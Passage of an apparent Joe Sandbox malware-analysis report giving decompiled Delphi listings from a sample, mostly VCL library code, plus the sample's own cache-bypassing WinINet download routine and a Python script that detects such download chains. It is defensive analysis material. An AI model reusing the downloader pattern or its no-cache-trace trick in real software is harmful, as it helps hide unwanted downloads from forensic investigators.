                                                    							_v61.dwTypeData = E00404E80(_v12);
                                                    							if(E0044C8DC(_t154) > 0) {
                                                    								_v61.hSubMenu = E0044AE70(_t154);
                                                    							}
                                                    							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
                                                    							goto L22;
                                                    						}
                                                    					}
                                                    					_t193 =  *((intOrPtr*)(_t154 + 0x64));
                                                    					__eflags = _t193;
                                                    					if(_t193 == 0) {
                                                    						L7:
                                                    						_push(_v12);
                                                    						_push(0x44abd4);
                                                    						E00449FC4( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
                                                    						_push(_v68);
                                                    						E00404D40();
                                                    						goto L8;
                                                    					}
                                                    					__eflags =  *((intOrPtr*)(_t193 + 0x64));
                                                    					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
                                                    						goto L7;
                                                    					}
                                                    					_t184 =  *0x449854; // 0x4498a0
                                                    					_t149 = E00403D78( *((intOrPtr*)(_t193 + 4)), _t184);
                                                    					__eflags = _t149;
                                                    					if(_t149 != 0) {
                                                    						goto L8;
                                                    					}
                                                    					goto L7;
                                                    				}
                                                    				_v61.hSubMenu = E0044AE70(_t154);
                                                    				goto L8;
                                                    			}

                                                    APIs
                                                    • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 0044AB0C
                                                    • GetVersion.KERNEL32(00000000,0044ABBB), ref: 0044A9FC
                                                      • Part of subcall function 0044AE70: CreatePopupMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE8B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Menu$CreateInsertItemPopupVersion
                                                    • String ID: ,$?
                                                    • API String ID: 133695497-2308483597
                                                    • Opcode ID: ce329fbcfb68304f05595de6c1e6c5ccc5445e86f25c9360cd087edaa36d7743
                                                    • Instruction ID: 398804152d519dd2ee62b9937964e6d4d0d5c4b5bb315d29c079f0e0da2fd4ec
                                                    • Opcode Fuzzy Hash: ce329fbcfb68304f05595de6c1e6c5ccc5445e86f25c9360cd087edaa36d7743
                                                    • Instruction Fuzzy Hash: 4861E270A042449BEB10EF79D881A9A77FAFF09304F04457AEA44E7356E738EC55C749
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 68%
                                                     			// The rectangle clamping, SPI_GETTOOLTIPANIMATION/SPI_GETTOOLTIPFADE probes and the
                                                     			// 100 ms AnimateWindow call match Delphi VCL THintWindow.ActivateHint (Forms.pas):
                                                     			// tooltip library code compiled into the sample rather than sample-specific logic.
                                                     			E00442BD0(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                     				intOrPtr* _v8;
                                                     				void _v12;
                                                     				intOrPtr _v16;
                                                     				int _v24;
                                                     				int _v28;
                                                     				intOrPtr _v32;
                                                     				char _v36;
                                                     				intOrPtr* _t80;
                                                     				intOrPtr _t91;
                                                     				void* _t119;
                                                     				intOrPtr _t136;
                                                     				intOrPtr _t145;
                                                     				void* _t148;
                                                     
                                                     				asm("movsd");                                   // four movsd: copy the 16-byte RECT argument (edx) into locals
                                                     				asm("movsd");
                                                     				asm("movsd");
                                                     				asm("movsd");
                                                     				_t119 = __ecx;                                  // hint text (Delphi register convention: eax=Self, edx=Rect, ecx=AHint)
                                                     				_v8 = __eax;                                    // Self
                                                     				_t145 =  *0x49de0c; // 0x49ebbc
                                                     				 *((char*)(_v8 + 0x210)) = 1;                   // "activating" flag, cleared again at the end
                                                     				_push(_t148);
                                                     				_push(0x442da9);
                                                     				_push( *[fs:eax]);
                                                     				 *[fs:eax] = _t148 + 0xffffffe0;                // Delphi try/finally frame linked into the SEH chain at fs:[0]
                                                     				E0043AFAC(_v8, __ecx, __ecx, _t145);
                                                     				_v16 = _v16 + 4;
                                                     				E0043C1D4(_v8,  &_v28);
                                                     				// clamp the hint rectangle so the window stays inside the screen bounds
                                                     				if(E00458218() <  *(_v8 + 0x4c) + _v24) {
                                                     					_v24 = E00458218() -  *(_v8 + 0x4c);
                                                     				}
                                                     				if(E00458224() <  *(_v8 + 0x48) + _v28) {
                                                     					_v28 = E00458224() -  *(_v8 + 0x48);
                                                     				}
                                                     				if(E0045820C() > _v28) {
                                                     					_v28 = E0045820C();
                                                     				}
                                                     				if(E00458200() > _v16) {
                                                     					_v16 = E00458200();
                                                     				}
                                                     				SetWindowPos(E00441704(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);   // HWND_TOPMOST (-1), SWP_NOACTIVATE (0x10)
                                                     				// animate only if the previous hint is more than 250 ms (0xfa) old, the hint text is shorter
                                                     				// than 100 chars (0x64) and AnimateWindow was resolved at run time (*0x49bc1c holds the pointer)
                                                     				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E00404C80(_t119) < 0x64 &&  *0x49bc1c != 0) {
                                                     					SystemParametersInfoA(0x1016, 0,  &_v12, 0);    // SPI_GETTOOLTIPANIMATION
                                                     					if(_v12 != 0) {
                                                     						SystemParametersInfoA(0x1018, 0,  &_v12, 0);   // SPI_GETTOOLTIPFADE
                                                     						if(_v12 == 0) {
                                                     							E00445E24( &_v36);                         // GetCursorPos (see the subcall in the API list)
                                                     							if(_v32 <= _v24) {                         // cursor above or below the hint selects the slide direction;
                                                     							}                                          // the decompiler dropped the flag assignment in this branch
                                                     						}
                                                     						 *0x49bc1c(E00441704(_v8), 0x64,  *0x0049BD24 | 0x00040000);   // AnimateWindow(Handle, 100 ms, flags); 0x40000 = AW_SLIDE,
                                                     					}                                                                // the fade path uses AW_BLEND (selection collapsed by the decompiler)
                                                     				}
                                                     				_t80 =  *0x49dbcc; // 0x49ebb8
                                                     				E0043EE38(_v8,  *((intOrPtr*)( *_t80 + 0x30)));
                                                     				ShowWindow(E00441704(_v8), 4);                  // SW_SHOWNOACTIVATE
                                                     				 *((intOrPtr*)( *_v8 + 0x7c))();                // virtual call through the object's VMT
                                                     				_pop(_t136);
                                                     				 *[fs:eax] = _t136;                             // finally: unlink the exception frame
                                                     				_push(0x442db0);
                                                     				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();  // remember when this hint was shown (used by the 250 ms check above)
                                                     				_t91 = _v8;
                                                     				 *((char*)(_t91 + 0x210)) = 0;                  // clear the "activating" flag
                                                     				return _t91;
                                                     			}

                                                     Instruction addresses (address column of the side-by-side view): 0x00442bde to 0x00442da8

                                                    APIs
                                                    • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,00442DA9), ref: 00442CB5
                                                    • GetTickCount.KERNEL32 ref: 00442CBA
                                                    • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 00442CF5
                                                    • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 00442D0D
                                                    • AnimateWindow.USER32(00000000,00000064,00000001), ref: 00442D53
                                                    • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,00442DA9), ref: 00442D76
                                                      • Part of subcall function 00445E24: GetCursorPos.USER32(?,?,00442D29,00001018,00000000,00000000,00000000,00001016,00000000,?,00000000,00000000,000000FF,?,?,?), ref: 00445E28
                                                    • GetTickCount.KERNEL32 ref: 00442D90
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                                    • String ID:
                                                    • API String ID: 3024527889-0
                                                    • Opcode ID: 54a305cc09a56bb811332e01a25417af1ec60ed1c2f6bf35ac9e9272792253b9
                                                    • Instruction ID: ec947e6fb4e605e95c0b99b07f50ee8800e03fd8639e7176e4c102910f3e7fae
                                                    • Opcode Fuzzy Hash: 54a305cc09a56bb811332e01a25417af1ec60ed1c2f6bf35ac9e9272792253b9
                                                    • Instruction Fuzzy Hash: 1F513D74A00109DFEB10DF99C986E9EB7F5AF04304F6045AAF500EB395DB78AE40DB99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 76%
                                                     			// The 64-entry GetKeyboardLayoutList, the "Keyboard Layouts\%.8x" registry path and the
                                                     			// "layout text" value match Delphi VCL TScreen.GetImes (Forms.pas): it enumerates the
                                                     			// installed keyboard layouts and caches the display names of the IME ones.
                                                     			E00458464(intOrPtr __eax, void* __ebx, void* __fp0) {
                                                     				intOrPtr _v8;
                                                     				int _v12;
                                                     				void* _v16;
                                                     				char _v20;
                                                     				void* _v24;
                                                     				struct HKL__* _v280;
                                                     				char _v536;
                                                     				char _v600;
                                                     				char _v604;
                                                     				char _v608;
                                                     				char _v612;
                                                     				void* _t60;
                                                     				intOrPtr _t106;
                                                     				intOrPtr _t111;
                                                     				void* _t117;
                                                     				void* _t118;
                                                     				intOrPtr _t119;
                                                     				void* _t129;
                                                     
                                                     				_t129 = __fp0;
                                                     				_t117 = _t118;
                                                     				_t119 = _t118 + 0xfffffda0;
                                                     				_v612 = 0;
                                                     				_v8 = __eax;                                        // Self
                                                     				_push(_t117);
                                                     				_push(0x45860f);
                                                     				_push( *[fs:eax]);
                                                     				 *[fs:eax] = _t119;                                 // Delphi try/finally frame
                                                     				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {              // list already built: nothing to do
                                                     					L11:
                                                     					_pop(_t106);
                                                     					 *[fs:eax] = _t106;
                                                     					_push(0x458616);
                                                     					return E004049C0( &_v612);                      // finally: release the temporary string
                                                     				} else {
                                                     					 *((intOrPtr*)(_v8 + 0x34)) = E00403BBC(1);     // create the string list that receives the names
                                                     					E004049C0(_v8 + 0x38);                          // clear the cached default-IME name
                                                     					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;   // up to 64 HKLs into a local array
                                                     					if(_t60 < 0) {
                                                     						L10:
                                                     						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
                                                     						E0041D5D8( *((intOrPtr*)(_v8 + 0x34)), 1);
                                                     						goto L11;
                                                     					} else {
                                                     						_v20 = _t60 + 1;                            // loop counter: number of layouts returned
                                                     						_v24 =  &_v280;                             // cursor into the HKL array
                                                     						do {
                                                     							if(E00446294( *_v24) == 0) {            // skip layouts that are not IMEs
                                                     								goto L9;
                                                     							} else {
                                                     								_v608 =  *_v24;                     // Format() argument record: the HKL as an integer
                                                     								_v604 = 0;
                                                     								// HKLM (0x80000002) \System\CurrentControlSet\Control\Keyboard Layouts\<HKL as %.8x>, KEY_READ (0x20019)
                                                     								if(RegOpenKeyExA(0x80000002, E0040A5E4( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) {
                                                     									goto L9;
                                                     								} else {
                                                     									_push(_t117);
                                                     									_push(0x4585cb);
                                                     									_push( *[fs:eax]);
                                                     									 *[fs:eax] = _t119;             // nested try/finally that closes the key
                                                     									_v12 = 0x100;                   // 256-byte buffer (_v536) for the value data
                                                     									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
                                                     										E00404C30( &_v612, 0x100,  &_v536);          // copy the layout name into a string
                                                     										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();   // virtual call: add it to the list
                                                     										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {  // this HKL is the default keyboard layout
                                                     											E00404C30(_v8 + 0x38, 0x100,  &_v536);   // remember its name as the default IME
                                                     										}
                                                     									}
                                                     									_pop(_t111);
                                                     									 *[fs:eax] = _t111;
                                                     									_push(0x4585d2);
                                                     									return RegCloseKey(_v16);       // finally handler; at run time control falls through to L9 (0x004585d2)
                                                     								}
                                                     							}
                                                     							goto L12;
                                                     							L9:
                                                     							_v24 = _v24 + 4;                        // next HKL
                                                     							_t38 =  &_v20;
                                                     							 *_t38 = _v20 - 1;
                                                     						} while ( *_t38 != 0);
                                                     						goto L10;
                                                     					}
                                                     				}
                                                     				L12:
                                                     			}

                                                     Instruction addresses (address column of the side-by-side view): 0x00458464 to 0x0045860e

                                                    APIs
                                                    • GetKeyboardLayoutList.USER32(00000040,?,00000000,0045860F,?,00000000,?,00458671,00000000,?,0043D4D3), ref: 004584BA
                                                    • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00458522
                                                    • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,004585CB,?,80000002,00000000), ref: 0045855C
                                                    • RegCloseKey.ADVAPI32(?,004585D2,00000000,?,00000100,00000000,004585CB,?,80000002,00000000), ref: 004585C5
                                                    Strings
                                                    • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 0045850C
                                                    • layout text, xrefs: 00458553
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseKeyboardLayoutListOpenQueryValue
                                                    • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                    • API String ID: 1703357764-2652665750
                                                    • Opcode ID: 8cc75bf8530aa7b8bc3295c685c4afb19f65476633fa01bc8007fe3bd1315606
                                                    • Instruction ID: 7c903f8fd9ad85d3247752ddaabe7f8220cad0ab59f1ef766b0bf81713acb4c4
                                                    • Opcode Fuzzy Hash: 8cc75bf8530aa7b8bc3295c685c4afb19f65476633fa01bc8007fe3bd1315606
                                                    • Instruction Fuzzy Hash: 7D415174A0420DAFDB10DF55C981B9EB7F8EB48305F5140EAE904B7352DB78AE04CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 70%
                                                     			// The 0x9AC6CDD7 key, the 22-byte (0x16) header and MulDiv(..., 2540) match Delphi VCL
                                                     			// TMetafile.WriteData (Graphics.pas): it serialises the EMF as an Aldus placeable WMF
                                                     			// (placeable header followed by the WMF bits) into a stream.
                                                     			E004288B4(void* __eax, void* __edx) {
                                                     				BYTE* _v8;
                                                     				int _v12;
                                                     				struct HDC__* _v16;
                                                     				short _v18;
                                                     				signed int _v24;
                                                     				short _v26;
                                                     				short _v28;
                                                     				char _v38;
                                                     				void* __ebx;
                                                     				void* __ebp;
                                                     				signed int _t35;
                                                     				struct HDC__* _t43;
                                                     				void* _t65;
                                                     				intOrPtr _t67;
                                                     				intOrPtr _t77;
                                                     				void* _t80;
                                                     				void* _t83;
                                                     				void* _t85;
                                                     				intOrPtr _t86;
                                                     
                                                     				_t83 = _t85;
                                                     				_t86 = _t85 + 0xffffffdc;
                                                     				_t80 = __edx;                                   // destination stream
                                                     				_t65 = __eax;                                   // Self (TMetafile)
                                                     				if( *((intOrPtr*)(__eax + 0x28)) == 0) {        // no image attached: nothing to write
                                                     					return __eax;
                                                     				} else {
                                                     					E004032B4( &_v38, 0x16);                    // FillChar(header, 22, 0): _v38 is the placeable header record
                                                     					_t67 =  *((intOrPtr*)(_t65 + 0x28));        // the shared image object
                                                     					_v38 = 0x9ac6cdd7;                          // header.Key: placeable-metafile magic
                                                     					_t35 =  *((intOrPtr*)(_t67 + 0x18));
                                                     					if(_t35 != 0) {
                                                     						_v24 = _t35;                            // header.Inch taken from the image
                                                     					} else {
                                                     						_v24 = 0x60;                            // default 96 units per inch
                                                     					}
                                                     					// bounding box: the image stores width/height in HIMETRIC (0.01 mm), 2540 (0x9ec) per inch
                                                     					_v28 = MulDiv( *(_t67 + 0xc), _v24 & 0x0000ffff, 0x9ec);     // header.Right
                                                     					_v26 = MulDiv( *(_t67 + 0x10), _v24 & 0x0000ffff, 0x9ec);    // header.Bottom
                                                     					_t43 = E00426DA8( &_v38);                   // checksum: XOR of the ten 16-bit words that precede the field
                                                     					_v18 = _t43;                                // header.CheckSum
                                                     					_push(0);
                                                     					L00407638();                                // GetDC(0); the import shows as 733AAC50.USER32 in the API list
                                                     					_v16 = _t43;                                // reference DC for GetWinMetaFileBits
                                                     					_push(_t83);
                                                     					_push(0x4289ef);
                                                     					_push( *[fs:eax]);
                                                     					 *[fs:eax] = _t86;                          // outer try/finally (releases the DC)
                                                     					_v12 = GetWinMetaFileBits( *(_t67 + 8), 0, 0, 8, _v16);   // size query; 8 = MM_ANISOTROPIC
                                                     					_v8 = E0040275C(_v12);                      // allocate the bits buffer
                                                     					_push(_t83);
                                                     					_push(0x4289cf);
                                                     					_push( *[fs:eax]);
                                                     					 *[fs:eax] = _t86;                          // inner try/finally (frees the buffer)
                                                     					if(GetWinMetaFileBits( *(_t67 + 8), _v12, _v8, 8, _v16) < _v12) {
                                                     						E00425FB8(_t67);                        // raises an "invalid metafile" exception
                                                     					}
                                                     					E0041D904(_t80, 0x16,  &_v38);              // Stream.WriteBuffer(header, 22)
                                                     					E0041D904(_t80, _v12, _v8);                 // Stream.WriteBuffer(bits, size)
                                                     					_pop(_t77);
                                                     					 *[fs:eax] = _t77;
                                                     					_push(0x4289d6);
                                                     					return E0040277C(_v8);                      // finally: free the bits buffer
                                                     			}

                                                     Instruction addresses (address column of the side-by-side view): 0x004288b5 to 0x004289fb

                                                    APIs
                                                    • MulDiv.KERNEL32(?,?,000009EC), ref: 00428906
                                                    • MulDiv.KERNEL32(?,?,000009EC), ref: 0042891D
                                                    • 733AAC50.USER32(00000000,?,?,000009EC,?,?,000009EC), ref: 00428934
                                                    • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,004289EF,?,00000000,?,?,000009EC,?,?,000009EC), ref: 00428958
                                                    • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,004289CF,?,?,00000000,00000000,00000008,?,00000000,004289EF), ref: 0042898B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: BitsFileMeta
                                                    • String ID: `
                                                    • API String ID: 858000408-2679148245
                                                    • Opcode ID: a9f53bc28096eb00c5e5236918538b4a0fd584b4a4d8f7f8bd18cc9ec4334467
                                                    • Instruction ID: f2e5e9c8815675a612d27dd2057d142453f41d2d556f4b9068e3620b80c0e0fa
                                                    • Opcode Fuzzy Hash: a9f53bc28096eb00c5e5236918538b4a0fd584b4a4d8f7f8bd18cc9ec4334467
                                                    • Instruction Fuzzy Hash: F6314575B00218ABDB01EFD5D882ABEB7B8EF4D704F50445AF904FB281D678AD40D7A9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 59%
                                                    			E00474FC0(void* __eax, void* __ebx, void* __edx, void* __esi) {
                                                    				void* _v8;
                                                    				void* _v12;
                                                    				long _v16;
                                                    				void _v1042;
                                                    				char _v1048;
                                                    				void* _t47;
                                                    				intOrPtr _t55;
                                                    				intOrPtr _t56;
                                                    				void* _t60;
                                                    				void* _t62;
                                                    				void* _t63;
                                                    				intOrPtr _t64;
                                                    
                                                    				_t62 = _t63;
                                                    				_t64 = _t63 + 0xfffffbec;
                                                    				_v1048 = 0;
                                                    				_t47 = __edx;
                                                    				_t60 = __eax;
                                                    				_push(_t62);
                                                    				_push(0x4750fb);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t64;
                                                    				E004049C0(__edx);
                                                    				_v8 = InternetOpenA("MyApp", 0, 0, 0, 0);
                                                    				_push(_t62);
                                                    				_push(0x4750db);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t64;
                                                    				if(_v8 == 0) {
                                                    					L6:
                                                    					_pop(_t55);
                                                    					 *[fs:eax] = _t55;
                                                    					_push(0x4750e2);
                                                    					return InternetCloseHandle(_v8);
                                                    				} else {
                                                    					_v12 = InternetOpenUrlA(_v8, E00404E80(_t60), 0, 0, 0x84000000, 0);
                                                    					if(_v12 == 0) {
                                                    						goto L6;
                                                    					} else {
                                                    						_push(_t62);
                                                    						_push(0x4750bd);
                                                    						_push( *[fs:eax]);
                                                    						 *[fs:eax] = _t64;
                                                    						while(1) {
                                                    							_v16 = 0x400;
                                                    							InternetReadFile(_v12,  &_v1042, 0x400,  &_v16);
                                                    							if(_v16 == 0) {
                                                    								break;
                                                    							}
                                                    							 *((char*)(_t62 + _v16 - 0x40e)) = 0;
                                                    							E00404C30( &_v1048, 0x402,  &_v1042);
                                                    							E00404C88(_t47, _v1048);
                                                    						}
                                                    						_pop(_t56);
                                                    						 *[fs:eax] = _t56;
                                                    						_push(0x4750c4);
                                                    						return InternetCloseHandle(_v12);
                                                    					}
                                                    				}
                                                    			}

                                                    APIs
                                                    • InternetOpenA.WININET(MyApp,00000000,00000000,00000000,00000000), ref: 00474FF9
                                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00475030
                                                    • InternetReadFile.WININET(00000000,?,00000400,00000400), ref: 0047506B
                                                    • InternetCloseHandle.WININET(00000000), ref: 004750B7
                                                    • InternetCloseHandle.WININET(00000000), ref: 004750D5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$CloseHandleOpen$FileRead
                                                    • String ID: MyApp
                                                    • API String ID: 3121278467-2115267534
                                                    • Opcode ID: 1fccfd11a45c6cc4102efae17bab0ce8ab5d7e7740f69415ac293a44f6d9b99d
                                                    • Instruction ID: 49772c5e95778878b0e4af45138c7482376825189897ce4c7807679e07b59e25
                                                    • Opcode Fuzzy Hash: 1fccfd11a45c6cc4102efae17bab0ce8ab5d7e7740f69415ac293a44f6d9b99d
                                                    • Instruction Fuzzy Hash: 2C31A7B1A04748ABE711DBA5DC12BDA77BCE748704F6184BAB704E76C0D6BC5940CA5C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
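The E00474FC0 listing above is the sample's own WinINet fetch routine: InternetOpenA with the user agent "MyApp", InternetOpenUrlA with dwFlags 0x84000000, then a loop reading 0x400-byte chunks with InternetReadFile and appending them to a string. 0x84000000 is INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE (wininet.h), so the request bypasses the WinINet cache and the body is never written to INetCache; do not expect a cache entry for whatever was downloaded when doing forensics on the host. The other listings in this span (GetWinMetaFileBits, ImageList_WriteEx gated on a comctl32 version of 6.0 or later, and the 0x12340042 / "DISPLAY" GetMonitorInfo fallback, which is the shape of the xGetMonitorInfo stub from multimon.h) look like Delphi VCL/RTL library code rather than the sample's own logic. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses the report's "APIs" lines (SAMPLE_TRACE is copied from the listing above), decodes the InternetOpenUrlA flags and reports the open/fetch/read chain. It also accepts the unresolved hex names and "Part of subcall function" prefixes seen in the neighbouring listings. The function names, the chain heuristic and the reduced flag table are the example's own assumptions.

```python
"""Parse Joe Sandbox "APIs" lines and flag a WinINet download chain.

Added example, not code from the Joe Sandbox report or the analysed sample.
SAMPLE_TRACE is copied from the E00474FC0 listing; flag values are from
wininet.h; every function name and the chain heuristic are assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Subset of the dwFlags bits InternetOpenUrlA accepts (values from wininet.h).
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}

# One "APIs" line of the report. The argument list is optional
# ("GetSystemMetrics.USER32 ref: 0042C96D") and a line may be prefixed with
# "Part of subcall function XXXXXXXX:".
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function [0-9A-Fa-f]{8}:\s*)?"
    r"(?P<name>\w+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

@dataclass
class ApiCall:
    name: str
    module: str
    ref: int                      # address of the call site
    args: List[object] = field(default_factory=list)

def parse_arg(token: str):
    """Known DWORDs print as 8 hex digits, strings verbatim, unknowns as '?'."""
    token = token.strip()
    return int(token, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", token) else token

def parse_api_lines(lines: List[str]) -> List[ApiCall]:
    calls = []
    for line in lines:
        m = API_LINE.match(line)
        if not m:                 # headings such as "APIs" or "Strings"
            continue
        args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["name"], m["module"].upper(), int(m["ref"], 16), args))
    return calls

def decode_internet_flags(value: int) -> List[str]:
    names = [n for bit, n in sorted(INTERNET_FLAGS.items(), reverse=True) if value & bit]
    leftover = value & ~sum(INTERNET_FLAGS)
    if leftover:
        names.append(f"0x{leftover:08X}")   # bits outside the table above
    return names

def _arg(call: ApiCall, i: int, typ):
    return call.args[i] if len(call.args) > i and isinstance(call.args[i], typ) else None

def find_download_chain(calls: List[ApiCall]) -> Optional[Dict]:
    """Summary of an InternetOpen -> InternetOpenUrl -> InternetReadFile chain
    ordered by call-site address, or None if the trace has no such chain."""
    first: Dict[str, ApiCall] = {}
    for c in sorted(calls, key=lambda c: c.ref):
        first.setdefault(re.sub(r"[AW]$", "", c.name), c)   # fold A/W variants
    needed = ("InternetOpen", "InternetOpenUrl", "InternetReadFile")
    if not all(n in first for n in needed):
        return None
    opn, url, rd = (first[n] for n in needed)
    if not opn.ref < url.ref < rd.ref:
        return None
    flags = _arg(url, 4, int) or 0
    return {
        "user_agent": _arg(opn, 0, str),
        "open_url_flags": decode_internet_flags(flags),
        # NO_CACHE_WRITE: the body is never written to the WinINet cache
        "no_cache_artifact": bool(flags & 0x04000000),
        "read_chunk": _arg(rd, 2, int),
        "call_sites": [f"0x{c.ref:08X}" for c in (opn, url, rd)],
    }

# Copied from the report's E00474FC0 "APIs" list.
SAMPLE_TRACE = """\
APIs
• InternetOpenA.WININET(MyApp,00000000,00000000,00000000,00000000), ref: 00474FF9
• InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00475030
• InternetReadFile.WININET(00000000,?,00000400,00000400), ref: 0047506B
• InternetCloseHandle.WININET(00000000), ref: 004750B7
• InternetCloseHandle.WININET(00000000), ref: 004750D5
""".splitlines()

if __name__ == "__main__":
    print(find_download_chain(parse_api_lines(SAMPLE_TRACE)))
```

Run it as-is to see the summary for this listing; paste any other function's "APIs" lines into parse_api_lines to check whether they form the same chain. The check is deliberately on call-site order rather than on the list order, because Joe Sandbox prints the list sorted by reference address and a second InternetCloseHandle (the handle cleanup in the finally blocks) must not disturb the match.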

                                                    C-Code - Quality: 56%
                                                    			E00448DC4(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                    				intOrPtr _v8;
                                                    				void* __ecx;
                                                    				intOrPtr _t9;
                                                    				void* _t11;
                                                    				intOrPtr _t17;
                                                    				void* _t28;
                                                    				intOrPtr _t33;
                                                    				intOrPtr _t34;
                                                    				intOrPtr _t37;
                                                    				struct HINSTANCE__* _t41;
                                                    				void* _t43;
                                                    				intOrPtr _t45;
                                                    				intOrPtr _t46;
